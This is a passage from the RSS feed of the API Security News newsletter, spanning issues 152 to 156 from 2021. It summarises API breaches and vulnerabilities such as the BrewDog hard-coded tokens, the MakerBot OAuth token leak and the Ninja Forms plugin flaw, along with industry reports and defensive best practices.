<p>For the most part, Knight was able to compromise the systems using relatively simple techniques, leading to the conclusion that greater controls should be imposed on developers consuming these APIs. For API security practitioners, the recommendations for app developers are of most interest and include:</p>
<ul>
<li>Don&#8217;t rely on the obfuscation of mobile app code to ensure security , but rather employ run-time shielding to prevent tampering with the app. In essence, both the app and the device should be authenticated on each API call.</li>
<li>Set up an attestation process for the app, the user, and the device to ensure that only known apps running in secure environments can access the APIs and the sensitive info behind them.</li>
<li>Ensure that mobile apps use certificate pinning to eliminate person-in-the-middle attacks.</li>
<li>Third-party app developers need to<em> shift security left and shield right</em> — many APIs appeared to be undefended.</li>
</ul>
<p>Specific recommendations were made for the FIHR API owners:</p>
<ul>
<li>Implement an API threat management solution.</li>
<li>Use penetration testers specializing in API.</li>
<li>Inventory all your APIs to ensure complete coverage with security controls.</li>
</ul>
<h2>Breach: 3D printers face hijacking risk</h2>
<p><a href="https://www.databreachtoday.com/thingiverse-breach-50000-printers-could-have-been-hijacked-a-17749" target="_blank" rel="noopener noreferrer">Further details have emerged this week</a> on the recent website breach at the 3D printer manufacturer MakerBot. A leaked MySQL database was discovered on an AWS S3 bucket, containing not only users&#8217; PII information but also — critically in some cases — OAuth tokens that could lead to a total takeover of the associated printers.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8687" src="https://apisecurity.io/wp-content/uploads/2021/10/Article2.jpg" alt="" width="600" height="450" /></p>
<p>The further context came when a former MakerBot software developer, TJ Horner, <a href="https://twitter.com/tjhorner/status/1448947826382213126?s=20" target="_blank" rel="noopener noreferrer">disclosed on Twitter</a> that up to 2 million users could have been impacted and that the OAuth tokens leaked were s0-called &#8220;<em>God-tokens</em>&#8221; that allowed full device access. In addition, the tokens were <em>permanent</em> (so no expiration to save you) and <em>irrevocable</em> (meaning that end-users themselves could not revoke them). The manufacturer contradicted these claims saying that only a &#8220;<em>handful (less than 500) of real user data</em>&#8221; were affected.</p>
<p>From an API security perspective, there are several lessons here:</p>
<ul>
<li>Tokens are valuable assets and should be adequately protected at rest, rather than left unencrypted in a database. Even a simple column-level database protection mechanism could have prevented the disclosure of the OAuth tokens in this case.</li>
<li>As the privileges of tokens increase, so does the impact of breaches. Avoid using tokens with excessive privileges: wherever possible, use tokens with fine-grained privileges, not &#8220;<em>God-tokens</em>&#8220;.</li>
<li>Always impose an expiration window on tokens to reduce the long-term impacts of a possible breach.</li>
<li>Provide users a method to revoke any and all tokens associated with their accounts or devices.</li>
</ul>
<h2>Article: API attacks, breaches piling up</h2>
<p>Illustrating the urgency of improving API security is <a href="https://www.datacenterknowledge.com/security/api-attacks-breaches-piling" target="_blank" rel="noopener noreferrer">the article this week on Data Center Knowledge</a> revealing the extent of API attacks and breaches in 2021. The highlight is that <em>only</em> 6% percent of companies surveyed reported <em>no</em> API-related security incident in the past year. Mind boggles!</p>
<p>Readers of this newsletter will be familiar with some of the higher-profile breaches mentioned in the article, such as:</p>
<ul>
<li><a href="https://apisecurity.io/issue-148-microsoft-power-apps-breach-bola-topcoder-portal-rfc-9101-released-api-hacking-guide/" target="_blank" rel="noopener noreferrer">38 million records exposed via Microsoft Power Apps</a></li>
<li><a href="https://apisecurity.io/issue-133-vulnerable-peloton-apis-api-contract-generation-net/" target="_blank" rel="noopener noreferrer">Peleton disclosure of customer account data via APIs</a></li>
<li><a href="https://apisecurity.io/issue-41-tinder-and-axway-breached-equifax-fined/" target="_blank" rel="noopener noreferrer">Equifax</a> and <a href="https://apisecurity.io/issue-76-3rd-party-api-leaks-8-mln-shopping-records/" target="_blank" rel="noopener noreferrer">Amazon and PayPal</a></li>
</ul>
<h2>Webinar: Why continuous API security is key to protecting your digital business</h2>
<p>On Thursday 21 October, 2021, Kuppinger Cole&#8217;s lead analyst Alexei Balaganski is hosting 42Crunch co-founder and field CTO Isabelle Mauny as they discuss a new approach to ensuring continuous API security: using a <em>shift left and shield right</em> approach.</p>
<p>The webinar will cover the following:</p>
<ul>
<li>Understand why API security is key to protecting your digital business.</li>
<li>Learn what is a best practice approach to achieve continuous API security.</li>
<li>Find out why dedicated API security is needed in addition to traditional AppSec technologies.</li>
<li>Discover how a leading global manufacturer is automating and scaling API security.</li>
</ul>
<p>Click <a href="https://www.kuppingercole.com/events/2021/10/api-security-digital-business?ref=w1021" target="_blank" rel="noopener noreferrer">here</a> to register and reserve your spot.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8689" src="https://apisecurity.io/wp-content/uploads/2021/10/Article3-1.jpg" alt="" width="607" height="342" /></p>
<p>The post <a href="https://apisecurity.io/issue-156-fhir-apis-vulnerable-abuse-3d-printers-facing-hijacking-risk-api-security-webinar/">Issue 156: FHIR APIs vulnerable to abuse, 3D printers facing hijacking risk, API security webinar</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 155: Vulnerability in BrewDog mobile app, APIClarity at KubeCon, API attacks in Open Banking</title>
		<link>https://apisecurity.io/issue-155-vulnerability-brewdog-mobile-app-apiclarity-kubecon-api-attacks-open-banking/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 13 Oct 2021 16:30:25 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8652</guid>

					<description><![CDATA[<p>This week, we have a vulnerability in the BrewDog mobile app exposing users&#8217; PII courtesy of hard-coded bearer tokens, Cisco has announced the arrival of their APIClarity at KubeCon 2021, F5 has published a report on API attacks in Open Banking, and finally, there&#8217;s a mega-guide on API security best practices. Vulnerability: Hard-coded API bearer [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-155-vulnerability-brewdog-mobile-app-apiclarity-kubecon-api-attacks-open-banking/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-155-vulnerability-brewdog-mobile-app-apiclarity-kubecon-api-attacks-open-banking/">Issue 155: Vulnerability in BrewDog mobile app, APIClarity at KubeCon, API attacks in Open Banking</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a vulnerability in the BrewDog mobile app exposing users&#8217; PII courtesy of hard-coded bearer tokens, Cisco has announced the arrival of their APIClarity at KubeCon 2021, F5 has published a report on API attacks in Open Banking, and finally, there&#8217;s a mega-guide on API security best practices.</p>
<h2>Vulnerability: Hard-coded API bearer token in BrewDog mobile app</h2>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8655" src="https://apisecurity.io/wp-content/uploads/2021/10/Article1.jpg" alt="" width="700" height="350" /></p>
<p>The big news item this week is the <a href="https://www.pentestpartners.com/security-blog/free-brewdog-beer-with-a-side-order-of-shareholder-pii/" target="_blank" rel="noopener noreferrer">vulnerability in the BrewDog mobile app</a> disclosed by Pen Test Partners. This vulnerability has potentially exposed the personal details of over 200,000 &#8216;Equity for Punks&#8217; shareholders over the last 18 months. It is currently unclear if the vulnerability has been exploited, but it certainly is not insignificant in its potential impact.</p>
<p>The researchers discovered that the developers of the mobile app had hard-coded API bearer tokens into the application source code. This meant that any user of the application could retrieve information for arbitrary users simply by guessing their user IDs. Worse still was that this information included clearly Personally Identifiable Information (PII) under the GDPR definitions.</p>
<p>When the user is interacting with the mobile app, each call the app makes to consume the API behind it includes a bearer token as part of the authentication process. Typically, these tokens should be short-lived session tokens and unique to each app user. The tokens are usually obtained through an authentication protocol — commonly OAuth2 — following successful authentication. This makes a bearer token a sensitive asset because it represents the user&#8217;s delegated identity. As such, it should be safeguarded in the app, and disposed of when a session is ended. Definitely these bearer tokens should <em>never ever</em> be stored in source code of the app, even if they were encrypted.</p>
<p>Remarkably, this is exactly what the researchers discovered when reverse-engineering the BrewDog app, with clear evidence of three hardcoded bearer tokens:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8657" src="https://apisecurity.io/wp-content/uploads/2021/10/Article1b.jpg" alt="" width="694" height="387" /></p>
<p>Moreover, by manipulating the user ID in API calls, it was possible to retrieve information about other users, including their PII like name, email, date of birth, addresses, and telephone numbers. There was also a <em>&#8216;Bar discount ID&#8217;</em> that is used to create QR codes for discounts on beers! Although the user IDs weren&#8217;t sequential it would be easy enough for an attacker to brute-force and download the full details for all users. Free beers, everyone!</p>
<p>The response from BrewDog  has been somewhat inadequate: they sought to initially avoid the issue, and then somewhat clumsily removed the vulnerable API which rendered the app somewhat dysfunctional. It took several attempts before the issue was properly remediated, with the release notes slightly ironically stating <em>&#8220;nothing too exciting&#8221;.</em></p>
<p>The lessons to be learned here are numerous and important, namely:</p>
<ul>
<li>Authentication is a complex process fraught with potential traps. Application developers are advised to use a robust, industry-proven framework, such as OAuth2 ,rather than some woefully inadequate method, like hardcoding the credentials.</li>
<li>A rudimentary machine search (like using <code>grep</code>) can identify hard-coded bearer credentials in the codebase and ensure they are eliminated before they are committed to a code repository. That they in this case were present as long as they did suggests that app developers were aware of them and relied on wishful thinking that they were never discovered. Attackers are a very clever bunch.</li>
<li>The ability to enumerate user IDs suggests the BrewDog API was vulnerable to <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">API1:2019 — Broken object level authorization</a>, although this could have been simply the result of broken authentication in the first place.</li>
<li>Savvy organizations should have an established process for breach management and vulnerability disclosure, something that was clearly lacking in this instance.</li>
</ul>
<p>Kudos to the researcher <a href="https://twitter.com/AlanMonie/status/1446505410618331137" target="_blank" rel="noopener noreferrer">Alan Monie</a> on this discovery and write-up — have a beer on us!</p>
<h2>Event: APIClarity announcement at KubeCon 2021</h2>
<p>This week sees the conferences KubeCon and CloudNativeCon 2021 taking place virtually — as well as in-person again. Of interest to API security practitioners is Cisco&#8217;s Vijoy Pandey (VP in Cisco&#8217;s Cloud Platform and Solutions Group) announcing a new open-source program called <a href="https://apiclarity.io/" target="_blank" rel="noopener noreferrer">APIClarity</a>. The project aims to address issues relating to API security and observability, namely configuration drifts, zombie (deprecated), and shadow (undocumented) APIs, to name but a few.</p>
<p>APIClarity — available on <a href="https://github.com/apiclarity/apiclarity" target="_blank" rel="noopener noreferrer">GitHub</a> — is described as &#8220;Wireshark for APIs&#8221; and is maintained by Cisco, 42Crunch (<a href="https://42crunch.com/42crunch-and-cisco-collaborate-to-drive-api-security-forward-and-to-increase-cloud-protection/" target="_blank" rel="noopener noreferrer">read more here</a>), and APIMetrics. A quick overview of the solution is available in this video:</p>
<div style="width: 640px;" class="wp-video"><!--[if lt IE 9]><script>document.createElement('video');</script><![endif]-->
<video class="wp-video-shortcode" id="video-8652-1" width="640" height="360" preload="metadata" controls="controls"><source type="video/mp4" src="https://apiclarity.io/assets/shared/apiclarity.mp4?_=1" /><a href="https://apiclarity.io/assets/shared/apiclarity.mp4">https://apiclarity.io/assets/shared/apiclarity.mp4</a></video></div>
<h2>Report: F5 report into cyber attacks on banks and financial services</h2>
<p>Next, we take a look at API attacks and Open Banking in the<a href="https://www.f5.com/labs/articles/threat-intelligence/cyberattacks-at-banks-and-financial-services-organizations-and-a-look-at-open-banking" target="_blank" rel="noopener noreferrer"> second part of a comprehensive report</a> from F5 on reported security incidents at financial organizations.</p>
<p>The most telling statistic here is the increase in the number of incidents that relate to APIs. From 2018 to 2020, only about 6% for incidents were API-related, whilst in 2020 APIs accounted for a whopping of 55% of the incident!</p>
<p>A similarly telling statistic is the fact that the financial sector is far more likely to suffer an API-related incident(a total of 50%) compared to the average of 4% across all industries.</p>
<p>The key takeaways from the report include:</p>
<ul>
<li>Open Banking is likely to become increasingly reliant on APIs, and decreasingly reliant on Open Financial Exchange (OFX).</li>
<li>Two-thirds of API incidents in 2020 were caused by combinations of no authentication, no authorization, or failures in either.</li>
<li>The combination of the two points above suggests an increasing attack surface for attackers to exploit Open Banking implementations.</li>
</ul>
<h2>Guide: API security mega guide</h2>
<p>Finally, Expedited Security has published <a href="https://expeditedsecurity.com/api-security-best-practices-megaguide/" target="_blank" rel="noopener noreferrer">an extremely comprehensive and easily consumable mega guide</a> into API security best practices.</p>
<p>This guide should prove invaluable to both novices and experts alike and covers several key topics, such as:</p>
<ul>
<li>Distributed Denial of Service (DDoS) attacks</li>
<li>Data breach attacks</li>
<li>OWASP Top 10 vulnerabilities</li>
<li>API security controls</li>
<li>API authentication and authorization</li>
<li>Secure API design guidelines</li>
<li>Security procedures</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-155-vulnerability-brewdog-mobile-app-apiclarity-kubecon-api-attacks-open-banking/">Issue 155: Vulnerability in BrewDog mobile app, APIClarity at KubeCon, API attacks in Open Banking</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		<enclosure url="https://apiclarity.io/assets/shared/apiclarity.mp4" length="51625416" type="video/mp4" />

			</item>
		<item>
		<title>Issue 154: Views on APIs and security, report into API misconfiguration, detecting malicious API activity</title>
		<link>https://apisecurity.io/issue-154-views-apis-security-report-api-misconfiguration-detecting-malicious-api-activity/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 06 Oct 2021 18:00:11 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8629</guid>

					<description><![CDATA[<p>This week, we have a viewpoint on what security officers can do to address API security. There&#8217;s also a report from IBM revealing that two-thirds of cloud breaches are due to misconfigured APIs, the best practices for detecting malicious activity on API endpoints, and a description of common attack vectors on GraphQL implementations. Correction: In [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-154-views-apis-security-report-api-misconfiguration-detecting-malicious-api-activity/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-154-views-apis-security-report-api-misconfiguration-detecting-malicious-api-activity/">Issue 154: Views on APIs and security, report into API misconfiguration, detecting malicious API activity</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a viewpoint on what security officers can do to address API security. There&#8217;s also a report from IBM revealing that two-thirds of cloud breaches are due to misconfigured APIs, the best practices for detecting malicious activity on API endpoints, and a description of common attack vectors on GraphQL implementations.</p>
<p><strong>Correction:</strong> In last week&#8217;s issue I incorrectly attributed<a href="https://www.mossadams.com/articles/2021/09/how-an-api-works" target="_blank" rel="noopener noreferrer"> an article on false-negatives in API scanning</a> &#8211; my apologies to Corey Ball (<span class="r-18u37iz"><a class="css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1cvl2hr r-1loqt21 r-poiln3 r-bcqeeo r-qvutc0" dir="ltr" role="link" href="https://twitter.com/hAPI_hacker">@hAPI_hacker</a></span>) for this error.</p>
<h2>Opinion: APIs and security</h2>
<p>This week, the 42Crunch Field CTO Isabelle Mauny was <a href="https://securityboulevard.com/2021/10/apis-and-security-whats-a-security-officer-to-do/" target="_blank" rel="noopener noreferrer">featured in Security Boulevard,</a> discussing how security officers should approach the challenges of securing APIs. The growth of API consumption has — unfortunately but unsurprisingly — resulted in an increase in attacks against API infrastructure, resulting in well-known breaches that have also been covered in this newsletter.</p>
<p>Mauny suggests that the reason why API security issues are so prevalent include:</p>
<ul>
<li>Development teams are increasingly agile, resulting in a more frequent release schedule that presents challenges to security teams who are still reliant on manual testing procedures.</li>
<li>Application development techniques are changing: the monolith is being broken down, and modern applications are composed of multiple APIs — frequently client-side — that can be invoked directly without adequate controls.</li>
<li>Security is typically implemented late in the application lifecycle as part of a mandatory compliance stage, which results in security testing with high false-positives late in the development process.</li>
</ul>
<p>Modern APIs (especially in interconnected microservices) erode the typical network boundaries and reduce the effectiveness of traditional perimeter protections, such as web application firewalls (WAFs). Mauny suggests with the receding importance of the perimeter, it is more important to protect the data than the perimeter itself.</p>
<p>The other key consideration is ensuring that API security tooling has the <em>full context</em> to ensure that the tool makes the correct decision, either statically (like when auditing an API contract against the OpenAPI standard) or dynamically when enforcing traffic behavior on an API endpoint. WAFs also exemplify how the lack of context renders them ineffective in protecting an API: a WAF cannot distinguish bad (unintended) behavior from good (intended) behavior.</p>
<p>Finally, the article highlights the value of API contracts as a means towards a positive security model, one in which the expected behavior is clearly defined, the opposite of a negative security model where bad behavior is inferred. By utilizing an API definition (such as an OpenAPI definition of the API contract) it is possible to verify the API development process at every stage of the development and deployment cycle. Such an approach affords a security officer early insight into the security posture of APIs and guarantees that APIs can be tested against their contracts.</p>
<h2>Report: Two-thirds of cloud breaches due to misconfigured APIs</h2>
<p><a href="https://siliconangle.com/2021/09/16/ibm-report-finds-two-thirds-cloud-breaches-traced-misconfigured-apis/" target="_blank" rel="noopener noreferrer">A recent report from IBM</a>  reveals that two-thirds of cloud breaches have their origins in misconfiguration of the API implementations. The report contains 12 months of findings from various IBM research teams and concludes that cloud environments need to be better secured.</p>
<p>The key findings from the report include:</p>
<ul>
<li>There is a vast and thriving black market for the resale of public cloud access details and credentials, such as Remote Desktop Protocol access.</li>
<li>Many systems could be compromised due to poor passwords and inadequate policies.</li>
<li>APIs were the most common cause of compromise, accounting for nearly two-thirds of the cases identified in the report.</li>
<li>The erosion of the traditional perimeter has resulted in more complex scenarios which are difficult to protect with legacy systems.</li>
</ul>
<p>The main recommendations from the report include:</p>
<ul>
<li>Environments should be secured by a more robust hardening of systems (such as by protecting passwords, or enforcing policies).</li>
<li>Stricter governance must be imposed on &#8220;shadow IT&#8221; because it represents an unquantified business risk and is a frequent source of compromise.</li>
<li>Organizations must understand the risks inherent in the rapid opening of hitherto internal-only APIs to public access because this opens new attack vectors.</li>
</ul>
<h2>Best practice: Detecting malicious activity on APIs</h2>
<p>Also featured this week is <a href="https://threatpost.com/unmasking-ghoulish-api-behavior/175253/" target="_blank" rel="noopener noreferrer">an article by Jason Kent in Threat Post</a> on how to detect malicious behavior on API endpoints. Increasingly, API endpoints intended for either web or mobile applications are under attack by rogue actors and bots. Being able to identify such attacks in systems allows potential attacks to be thwarted before they are successful.</p>
<p>Kent&#8217;s experience as a hacker comes to the fore in the article, with several key (and relatively simple) suggestions for API developers:</p>
<ul>
<li>Use a separate domain for web and mobile applications. This allows spurious activity to be identified, for example, by being able to detect when a browser is accessing an endpoint intended for a mobile application — a leading indicator that a human attacker may be attempting to reverse-engineer the API.</li>
<li>Pay attention to the presence of &#8216;crawlers&#8217; — such as Facebook and Google, commonly used in enumerating websites — in API endpoints, particularly those for mobile applications. The presence of crawlers in logs is often an indication of active reconnaissance and an imminent attack.</li>
<li>Review API logs periodically,  paying particular attention to user agent strings — a sign of unusual or unexpected behavior is often the precursor to an attack.</li>
</ul>
<p>Given the rise of bot attacks on APIs, these simple recommendations should prove valuable to API builders.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8642" src="https://apisecurity.io/wp-content/uploads/2021/10/Article3.jpg" alt="" width="721" height="377" /></p>
<h2>Article: Practical GraphQL attack vectors</h2>
<p>In <a href="https://apisecurity.io/issue-150-vulnerability-fortress-home-security-system-api-fuzzing-techniques-hardening-graphql-implementations-central-governance-apis/" target="_blank" rel="noopener noreferrer">issue 150</a>, we covered best practices for hardening your GraphQL implementations. In this week&#8217;s issue, we feature <a href="https://securitycafe.ro/2021/10/01/practical-graphql-attack-vectors/" target="_blank" rel="noopener noreferrer">some brief observations on common attack vectors used against GraphQL</a>  implementations.</p>
<p>GraphQL is a data query language that allows the client to construct arbitrary data queries against the underlying data stores . This contrasts to the more well-established REST API that allows a structured method of access through known endpoints. The difference is illustrated below:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8644" src="https://apisecurity.io/wp-content/uploads/2021/10/Article4.jpg" alt="" width="692" height="416" /></p>
<p>Whilst the GraphQL endpoint provides more flexibility for the client consumer, it does represent additional security considerations due to the complexity of the underlying implementation. Mihalache&#8217;s article highlights a few common attack vectors to consider to protect, or other compensating controls:</p>
<ul>
<li><strong>Introspection</strong>: One of the benefits of GraphQL is the ability to dynamically enumerate the underlying data, which can — unfortunately — facilitate attackers&#8217; discovery process.</li>
<li><strong>Missing access controls</strong>: Default implementations don&#8217;t provide access controls, developers must be implemented them in bespoke logic.</li>
<li><strong>SQL and NoSQL injections</strong>: GraphQL is easily susceptible to traditional injection attacks on the backing data stores.</li>
<li><strong>Information disclosure</strong>: Default GraphQL implementations tend to be very verbose, potentially to the advantage of attackers.</li>
<li><strong>Bypassing rate limiting:</strong> Batching queries can lead to denial of service (DoS) attacks on the GraphQL endpoints.</li>
<li><strong>DoS</strong>: In addition to above, nested queries too can easily be used for launching DoS attacks.</li>
</ul>
<p>Mihalache reaches the same conclusion as our previously referenced GraphQL article, namely that default GraphQL implementations are often insecure by default, and the savvy API developer is well-advised to harden implementations to eliminate some of the more common attack vectors.</p>
<p>The post <a href="https://apisecurity.io/issue-154-views-apis-security-report-api-misconfiguration-detecting-malicious-api-activity/">Issue 154: Views on APIs and security, report into API misconfiguration, detecting malicious API activity</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 153: Rapid proliferation of APIs, WordPress API vulnerability, false-negative API scanning</title>
		<link>https://apisecurity.io/issue-153-rapid-proliferation-apis-wordpress-api-vulnerability-false-negative-api-scanning/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 29 Sep 2021 09:00:02 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8598</guid>

					<description><![CDATA[<p>This week, we have an article on how API proliferation is opening up security holes, another vulnerability in WordPress REST API , again through a third-party plugin. In addition, we look into the importance of false-negative API vulnerability scanning, and API protection as a key element of a cloud security strategy. Article: Rapid proliferation of [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-153-rapid-proliferation-apis-wordpress-api-vulnerability-false-negative-api-scanning/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-153-rapid-proliferation-apis-wordpress-api-vulnerability-false-negative-api-scanning/">Issue 153: Rapid proliferation of APIs, WordPress API vulnerability, false-negative API scanning</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have an article on how API proliferation is opening up security holes, another vulnerability in WordPress REST API , again through a third-party plugin. In addition, we look into the importance of false-negative API vulnerability scanning, and API protection as a key element of a cloud security strategy.</p>
<h2>Article: Rapid proliferation of APIs opens up security holes</h2>
<p>This week, we have a <a href="https://www.scmagazine.com/analysis/application-security/rapid-proliferation-of-apis-opens-up-new-security-holes" target="_blank" rel="noopener noreferrer">keynote speech from author and cyber entrepreneur Alissa Knight at the HackerOne Security@</a>  virtual conference, in which she discusses how the rapid proliferation of APIs is opening up security holes.</p>
<p>Knight is an active API security researcher who believes that only now are we gaining a full insight into the risk that APIs expose as the industry collects more and more statistics around API security. The most well-known API-related vulnerability is <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">broken object-level authorization (BOLA)</a> which Knight likens to<em> &#8220;the scenario to a coat check where the employee behind the counter looks at a person’s claim number but doesn’t notice that the number had been changed with a marker&#8221;.</em></p>
<p>Knight&#8217;s prominent research in recent times relates to API vulnerabilities in connected police vehicles, which allowed her to remotely lock and unlock the car doors, or start and stop the engines. The key takeaway in this research was the lack of certificate pinning, allowing a researcher (or an attacker) to use a proxy like Burp Suite or Mitmproxy to perform man-in-the-middle attacks on the remote systems. Where certificate pinning was implemented at all, there were shortcomings in the implementations.</p>
<p>Knight&#8217;s research has also included hacking 30 financial services and fintech companies using their APIs and uncovering  significant vulnerabilities, such as being able to change arbitrary PINs or transfer funds. Her opinion is that as banks tend to outsource much of their development, which results in issues being systemic across all banks.</p>
<p>The full content of the HackerOne Security@ conference is available <a href="https://www.hackerone.com/security-at/2021#ondemand" target="_blank" rel="noopener noreferrer">here</a>. Knight&#8217;s keynote &#8220;The Best Kept Secret in Cybersecurity<em>&#8220;</em> is the first on the list.</p>
<h2>Vulnerability: WordPress plugin Ninja Forms exposes REST API vulnerability</h2>
<p>This week also saw <a href="https://www.searchenginejournal.com/wordpress-ninja-forms-vulnerability-exposes-over-a-million-sites/420726/" target="_blank" rel="noopener noreferrer">another vulnerability in a popular WordPress plugin, Ninja Forms</a>, exposing key WordPress data through the WordPress REST API.</p>
<p>WordPress exposes its core functionalities through a REST API. Whilst the WordPress API requires authentication, vulnerabilities often arise from plugins that implement authorization inadequately. As recently as in our<a href="https://apisecurity.io/issue-147-vulnerabilities-in-seopress-plugin-and-steam-portal-results-from-an-application-security-survey/" target="_blank" rel="noopener noreferrer"> issue 147</a> we covered a similar vulnerability in the SEOPress plugin, which failed to fully validate API requests.</p>
<p>In this instance, the Ninja Forms plugin provided a permissions callback (invoked by the WordPress core to validate a client&#8217;s permission levels based on a particular API call). This callback checked if a user was registered. However, it failed to check if the user had a permission to execute bulk export of <em>all</em> forms submitted using the plugin. This is a significant case of sensitive information disclosure because such information could include sensitive information, like emails or other PII.</p>
<p>The plugin provider has since patched the vulnerability, and uses are advised to upgrade to the most recent version of the plugin.</p>
<p>The key takeaways:</p>
<ul>
<li>The failure to fully validate API requests is a leading factor in vulnerable APIs. In this particular case, we saw an example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization" target="_blank" rel="noopener noreferrer">OWASP API:5 Broken Function-Level Authorization</a>.</li>
<li>Authentication is not enough on its own. Authorization needs to be in place, too.</li>
</ul>
<h2>Article: The importance of false-negative API vulnerability scanning</h2>
<p>An interesting article for me this week was the further coverage on <a href="https://www.mossadams.com/articles/2021/09/how-an-api-works" target="_blank" rel="noopener noreferrer">API vulnerability scanning and the dangers of false-negatives</a> lulling the security team into a false sense of security. <a href="https://thenewstack.io/application-security-tools-are-not-up-to-the-job-of-api-security/" target="_blank" rel="noopener noreferrer">Last week</a>, I had discussed a similar topic relating to shortcomings in traditional SAST/DAST tools.</p>
<p>The authors Corey Ball (@hAPI_hacker) and Troy Hawes describes the importance of performing security testing of APIs and summarizes the management of API risk concisely as follows:</p>
<blockquote>
<ul>
<li><em>APIs aren’t a part of vulnerability management programs and are overlooked</em></li>
<li><em>Information security teams lack the knowledge to thoroughly test APIs</em></li>
<li><em>APIs are tested generically and false negatives provide organizations with a false sense of security</em></li>
<li><em>APIs are only tested by the development team</em></li>
<li><em>APIs aren’t considered with an adversarial mindset</em></li>
</ul>
</blockquote>
<p>In particular, it is the third point that is paramount. My article concluded that reliance on SAST/DAST testing could result in false-negatives, in other words missing the detection of vulnerabilities within an API implementation. The author claims that <em>&#8220;if you’re scanning your APIs with generic vulnerability scans or even web application scans, then you’re likely missing eight out of 10 of the top API vulnerabilities&#8221;.</em></p>
<p>The other key takeaway here is that automated testing — whilst valuable — is unable to detect more complex business logic flaws, such as a sequence of interactions using API. For such cases, a dedicated API penetration test conducted by a skilled human penetration tester mimicking the actions of an attacker is recommended. Particularly important is the adversarial mindset when conducting such testing — don&#8217;t think like a developer, think like an attacker. Hawes concludes that the role of API monitoring is vital to detect deviation from APIs&#8217; normal operation that attackers cause.</p>
<h2>Opinion: API protection as a key element of a cloud security strategy</h2>
<p>Finally this week, we have some brief thoughts from Brian Schwarz on <a href="https://thenewstack.io/dont-leave-your-apis-undefended-against-security-risks/" target="_blank" rel="noopener noreferrer">approaches to API security as part of a broader cloud security strategy</a>.</p>
<p>Schwarz calls out the inadequacies of reliance on traditional web application firewalls (WAFs) in protecting APIs and suggests using more modern Web Application and API Protection (WAAP) solutions. Perhaps the most interesting insight from Schwarz is the suggestion of enforcing API protection and defense at the platform level, rather than relying on individual development teams to provide adequate protection during their development lifecycles.</p>
<p>Certainly, such a reliance on bespoke or custom protections can lead to deficiencies in the overall organization estate, because it is all too easy for developers to overlook elements of API security in their haste to release new features and functionality. A decentralized approach can result in inconsistencies in protection.</p>
<p>Related to siloed API protections within API development teams is the topic of central API detection and compliance. A benefit of centrally enforcing API policies against emergent threats ensures that protection is applied in a uniform manner and is consistent with the organization&#8217;s compliance and regulatory requirements.</p>
<p>The post <a href="https://apisecurity.io/issue-153-rapid-proliferation-apis-wordpress-api-vulnerability-false-negative-api-scanning/">Issue 153: Rapid proliferation of APIs, WordPress API vulnerability, false-negative API scanning</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 152: Exposed API keys and tokens, SAST/DAST for API security testing, the value of API specifications</title>
		<link>https://apisecurity.io/issue-152-exposed-api-keys-tokens-sast-dast-api-security-testing-value-api-specifications/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 22 Sep 2021 18:00:51 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8571</guid>

					<description><![CDATA[<p>This week, we have a breach involving exposed API keys for payment integration, leaked API tokens on Travis CI,  the shortcomings of static and dynamic application security testing (SAST/DAST) for API security, and the value that API specification frameworks bring. Breach: Exposed payment integration API keys The big news story this week was the leakage [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-152-exposed-api-keys-tokens-sast-dast-api-security-testing-value-api-specifications/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-152-exposed-api-keys-tokens-sast-dast-api-security-testing-value-api-specifications/">Issue 152: Exposed API keys and tokens, SAST/DAST for API security testing, the value of API specifications</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a breach involving exposed API keys for payment integration, leaked API tokens on Travis CI,  the shortcomings of static and dynamic application security testing (SAST/DAST) for API security, and the value that API specification frameworks bring.</p>
